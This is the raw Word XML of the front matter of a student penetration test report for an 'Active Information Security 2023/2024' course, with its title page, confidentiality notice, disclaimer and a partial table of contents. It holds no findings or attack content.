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2D6E" w14:textId="41286504" w:rsidR="00475B86" w:rsidRPr="00060D9E" w:rsidRDefault="00060D9E">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:before="320" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:eastAsia="Proxima Nova" w:hAnsi="Proxima Nova" w:cs="Proxima Nova"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:eastAsia="Proxima Nova" w:hAnsi="Proxima Nova" w:cs="Proxima Nova"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Elizabeth Velikova Koleva</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044B8F6A" w14:textId="77777777" w:rsidR="00060D9E" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:before="1440" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:eastAsia="Proxima Nova" w:hAnsi="Proxima Nova" w:cs="Proxima Nova"/>
          <w:color w:val="009DDC"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_8cu1o4xedxtb" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:eastAsia="Proxima Nova" w:hAnsi="Proxima Nova" w:cs="Proxima Nova"/>
          <w:color w:val="009DDC"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Assessment Report </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59889CAB" w14:textId="126DE9F4" w:rsidR="00475B86" w:rsidRDefault="00060D9E">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:before="1440" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:eastAsia="Proxima Nova" w:hAnsi="Proxima Nova" w:cs="Proxima Nova"/>
          <w:color w:val="009DDC"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>Penetration Test</w:t>
      </w:r>
      <w:r w:rsidR="00922DBC">
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:eastAsia="Proxima Nova" w:hAnsi="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
          <w:color w:val="404040"/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="38960B4B" w14:textId="76C9C30C" w:rsidR="00475B86" w:rsidRDefault="00060D9E" w:rsidP="00060D9E">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Active Information Security 2023/2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3BFC88" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00475B86">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B53E7C3" w14:textId="7899686C" w:rsidR="00475B86" w:rsidRDefault="00EA24AF">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Faculty number: 82173</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D5AD7D" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CEF1582" w14:textId="1BAAB482" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Report Issued: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00060D9E">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>10.01.2024</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4B18E4D5" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="150F9998" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc155811449"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Confidentiality Notice</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="12842A5F" w14:textId="371CCC72" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">This report contains sensitive, privileged, and confidential information. Precautions should be taken to protect the confidentiality of the information in this document. Publication of this report may cause reputational damage to </w:t>
      </w:r>
      <w:r w:rsidR="00060D9E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>AIS (Ivan Zlatanov)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> or facilitate attacks </w:t>
      </w:r>
      <w:r w:rsidR="00060D9E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>AIS (Ivan Zlatanov)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00060D9E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Elizabeth Velikova Koleva </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">shall not be held liable for special, incidental, </w:t>
      </w:r>
      <w:r w:rsidR="00060D9E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>collateral,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> or consequential damages arising out of the use of this information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735A434B" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_3aofwon93h1i" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="3" w:name="_Toc155811450"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:t>Disclaimer</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="68D48AB5" w14:textId="63F88968" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Note that this assessment may not disclose all vulnerabilities that are present on the systems within the scope of the engagement. This report is a summary of the findings from a “point-in-time” assessment made on </w:t>
      </w:r>
      <w:r w:rsidR="00060D9E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>AIS (Ivan Zlatanov)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">’s environment. Any changes made to the environment during the period of testing may affect the results of the assessment. </w:t>
      </w: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id w:val="838432420"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="68ECE9D7" w14:textId="61D1A7E8" w:rsidR="00EA24AF" w:rsidRDefault="00922DBC">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:lang w:val="en-US"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \h \u \z </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc155811449" w:history="1">
            <w:r w:rsidR="00EA24AF" w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Confidentiality Notice</w:t>
            </w:r>
            <w:r w:rsidR="00EA24AF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00EA24AF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00EA24AF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811449 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00EA24AF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00EA24AF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00EA24AF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="63D3D42A" w14:textId="4D6421C1"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0" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Disclaimer</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811450 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="507F4126" w14:textId="7A74895F"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51" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.   Introduction</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811451 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3CF32C3E" w14:textId="63AB05E2" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:lang w:val="en-US"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc155811452" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="SymbolMT" w:hAnsi="SymbolMT"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:lang w:val="en-US"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811452 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="57F50D68" w14:textId="2E7E3B59"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3" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2. Scope of this risk assessment</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811453 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6F10222D" w14:textId="0A153E31"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54" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.  Risk Assessment Approach</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811454 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="58FBF88E" w14:textId="4735B9CD"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5" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1 Participants</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811455 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="557B421E" w14:textId="0A2B6772"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6" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2 Techniques Used</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811456 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="74A44D44" w14:textId="42F76AAB"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7" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3 Risk Model</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811457 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5E3517C5" w14:textId="03BC85FD"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58" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3. System Characterization</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811458 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="35DDDA53" w14:textId="580D9D1E"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59" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1 Technology components</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811459 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1B0D825D" w14:textId="595B3C16"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0" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3 Data Used By System</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811460 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="704EE5F3" w14:textId="1DC106B1"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1" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4 Users</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811461 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1DD89603" w14:textId="23FB8209"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62" w:history="1">
